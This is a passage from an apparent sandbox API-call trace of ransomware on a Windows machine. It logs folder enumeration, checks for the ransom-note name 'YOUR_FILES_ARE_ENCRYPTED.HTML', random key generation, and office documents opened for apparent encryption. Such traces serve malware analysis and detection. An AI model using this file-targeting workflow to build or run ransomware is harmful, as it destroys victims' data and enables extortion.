ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52e9524b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0123.998] StrStrIW (lpFirst="Documents", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.998] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents") returned 35 [0123.998] GetProcessHeap () returned 0x600000 [0123.998] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0124.000] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents" [0124.022] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\*" [0124.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x52e9524b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52e9524b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0124.022] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x52e9524b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52e9524b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0124.023] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2291c600, ftCreationTime.dwHighDateTime=0x1d68e8d, ftLastAccessTime.dwLowDateTime=0xcf6603a0, ftLastAccessTime.dwHighDateTime=0x1d6a706, ftLastWriteTime.dwLowDateTime=0xcf6603a0, ftLastWriteTime.dwHighDateTime=0x1d6a706, nFileSizeHigh=0x0, nFileSizeLow=0xcc1f, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="-wLjNs963VCw.pptx", cAlternateFileName="-WLJNS~1.PPT")) returned 1 [0124.023] StrStrIW (lpFirst="-wLjNs963VCw.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.023] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx") returned 53 [0124.023] PathFindExtensionW (pszPath="-wLjNs963VCw.pptx") returned=".pptx" [0124.023] lstrlenW (lpString=".pptx") returned 5 [0124.023] PathFindExtensionW (pszPath="-wLjNs963VCw.pptx") returned=".pptx" [0124.023] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\-wljns963vcw.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.024] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=52255) returned 1 [0124.024] GetProcessHeap () returned 0x600000 [0124.024] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.027] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="1E") returned 2 [0124.027] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="4E") returned 2 [0124.027] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="84") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="5D") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="EF") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="EA") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="EB") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="F9") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="9D") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="A3") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="AE") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="BA") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="14") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="6C") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="8F") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="2A") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="CB") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="94") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="3A") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="8D") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="BD") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="96") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="A7") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="31") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="7A") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="59") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="74") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="1E") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="50") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="59") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="A1") returned 2 [0124.028] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="05") returned 2 [0124.029] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\-wLjNs963VCw.pptx" [0124.029] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.029] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.029] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ba3a580, ftCreationTime.dwHighDateTime=0x1d6923a, ftLastAccessTime.dwLowDateTime=0x53f83740, ftLastAccessTime.dwHighDateTime=0x1d6cde1, ftLastWriteTime.dwLowDateTime=0x53f83740, ftLastWriteTime.dwHighDateTime=0x1d6cde1, nFileSizeHigh=0x0, nFileSizeLow=0x10dd2, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="3xaCTo76.docx", cAlternateFileName="3XACTO~1.DOC")) returned 1 [0124.029] StrStrIW (lpFirst="3xaCTo76.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.029] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx") returned 49 [0124.029] PathFindExtensionW (pszPath="3xaCTo76.docx") returned=".docx" [0124.029] lstrlenW (lpString=".docx") returned 5 [0124.029] PathFindExtensionW (pszPath="3xaCTo76.docx") returned=".docx" [0124.029] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\3xacto76.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.031] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=69074) returned 1 [0124.031] GetProcessHeap () returned 0x600000 [0124.031] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.034] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="B4") returned 2 [0124.034] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="F4") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="72") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="95") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="02") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F2") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="8A") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="DB") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="BA") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="AB") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="2F") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="90") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="9E") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="82") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="39") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="AD") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="46") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="99") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="B2") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="FA") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="AC") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="C0") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="FA") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="AA") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="6C") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="AD") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="4D") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="BC") returned 2 [0124.034] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="F7") returned 2 [0124.035] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="46") returned 2 [0124.035] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="B4") returned 2 [0124.035] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5A") returned 2 [0124.035] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\3xaCTo76.docx" [0124.035] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.035] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.035] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e470e50, ftCreationTime.dwHighDateTime=0x1d6aec3, ftLastAccessTime.dwLowDateTime=0xe5b6bda0, ftLastAccessTime.dwHighDateTime=0x1d6e36c, ftLastWriteTime.dwLowDateTime=0xe5b6bda0, ftLastWriteTime.dwHighDateTime=0x1d6e36c, nFileSizeHigh=0x0, nFileSizeLow=0x2dec, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="4eP4pM2.pptx", cAlternateFileName="4EP4PM~1.PPT")) returned 1 [0124.035] StrStrIW (lpFirst="4eP4pM2.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.035] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx") returned 48 [0124.035] PathFindExtensionW (pszPath="4eP4pM2.pptx") returned=".pptx" [0124.035] lstrlenW (lpString=".pptx") returned 5 [0124.035] PathFindExtensionW (pszPath="4eP4pM2.pptx") returned=".pptx" [0124.035] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4ep4pm2.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.036] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=11756) returned 1 [0124.037] GetProcessHeap () returned 0x600000 [0124.037] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.040] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="64") returned 2 [0124.040] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="59") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="5A") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="7D") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="52") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="3F") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="93") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="DC") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="0E") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="89") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="A2") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="38") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="76") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="22") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="25") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="C4") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="C1") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="E8") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="E9") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="9C") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="C1") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="95") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="89") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="75") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="CB") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="EC") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="E3") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="A6") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="9A") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="EA") returned 2 [0124.040] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="B2") returned 2 [0124.041] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="53") returned 2 [0124.041] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx" [0124.041] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.041] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.042] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc30af040, ftCreationTime.dwHighDateTime=0x1d6fb14, ftLastAccessTime.dwLowDateTime=0xc1a99b40, ftLastAccessTime.dwHighDateTime=0x1d704c7, ftLastWriteTime.dwLowDateTime=0xc1a99b40, ftLastWriteTime.dwHighDateTime=0x1d704c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="6D2j8wRsZ4UySx4Ge", cAlternateFileName="6D2J8W~1")) returned 1 [0124.042] StrStrIW (lpFirst="6D2j8wRsZ4UySx4Ge", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.042] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge") returned 53 [0124.042] GetProcessHeap () returned 0x600000 [0124.042] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.047] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge" [0124.047] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\*" [0124.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc30af040, ftCreationTime.dwHighDateTime=0x1d6fb14, ftLastAccessTime.dwLowDateTime=0xc1a99b40, ftLastAccessTime.dwHighDateTime=0x1d704c7, ftLastWriteTime.dwLowDateTime=0xc1a99b40, ftLastWriteTime.dwHighDateTime=0x1d704c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName=".", cAlternateFileName="")) returned 0x626878 [0124.047] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc30af040, ftCreationTime.dwHighDateTime=0x1d6fb14, ftLastAccessTime.dwLowDateTime=0xc1a99b40, ftLastAccessTime.dwHighDateTime=0x1d704c7, ftLastWriteTime.dwLowDateTime=0xc1a99b40, ftLastWriteTime.dwHighDateTime=0x1d704c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName="..", cAlternateFileName="")) returned 1 [0124.047] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd76157e0, ftCreationTime.dwHighDateTime=0x1d6fd45, ftLastAccessTime.dwLowDateTime=0x1bd4c0d0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1bd4c0d0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName="K68ZIV", cAlternateFileName="")) returned 1 [0124.047] StrStrIW (lpFirst="K68ZIV", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.047] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV") returned 60 [0124.047] GetProcessHeap () returned 0x600000 [0124.048] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0124.070] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV" [0124.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\*" [0124.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd76157e0, ftCreationTime.dwHighDateTime=0x1d6fd45, ftLastAccessTime.dwLowDateTime=0x1bd4c0d0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1bd4c0d0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0124.070] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd76157e0, ftCreationTime.dwHighDateTime=0x1d6fd45, ftLastAccessTime.dwLowDateTime=0x1bd4c0d0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1bd4c0d0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="..", cAlternateFileName="")) returned 1 [0124.070] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22823e10, ftCreationTime.dwHighDateTime=0x1d6fb98, ftLastAccessTime.dwLowDateTime=0x86682840, ftLastAccessTime.dwHighDateTime=0x1d6fc29, ftLastWriteTime.dwLowDateTime=0x86682840, ftLastWriteTime.dwHighDateTime=0x1d6fc29, nFileSizeHigh=0x0, nFileSizeLow=0x1558e, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="21_gJ.ots", cAlternateFileName="")) returned 1 [0124.070] StrStrIW (lpFirst="21_gJ.ots", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.070] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\21_gJ.ots") returned 70 [0124.070] PathFindExtensionW (pszPath="21_gJ.ots") returned=".ots" [0124.070] lstrlenW (lpString=".ots") returned 4 [0124.070] PathFindExtensionW (pszPath="21_gJ.ots") returned=".ots" [0124.070] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x449498c0, ftCreationTime.dwHighDateTime=0x1d700c7, ftLastAccessTime.dwLowDateTime=0x15d88210, ftLastAccessTime.dwHighDateTime=0x1d70542, ftLastWriteTime.dwLowDateTime=0x15d88210, ftLastWriteTime.dwHighDateTime=0x1d70542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="4v07jmXO0a", cAlternateFileName="4V07JM~1")) returned 1 [0124.070] StrStrIW (lpFirst="4v07jmXO0a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.071] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a") returned 71 [0124.071] GetProcessHeap () returned 0x600000 [0124.071] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0124.072] lstrcpyW (in: lpString1=0x3106fd8, 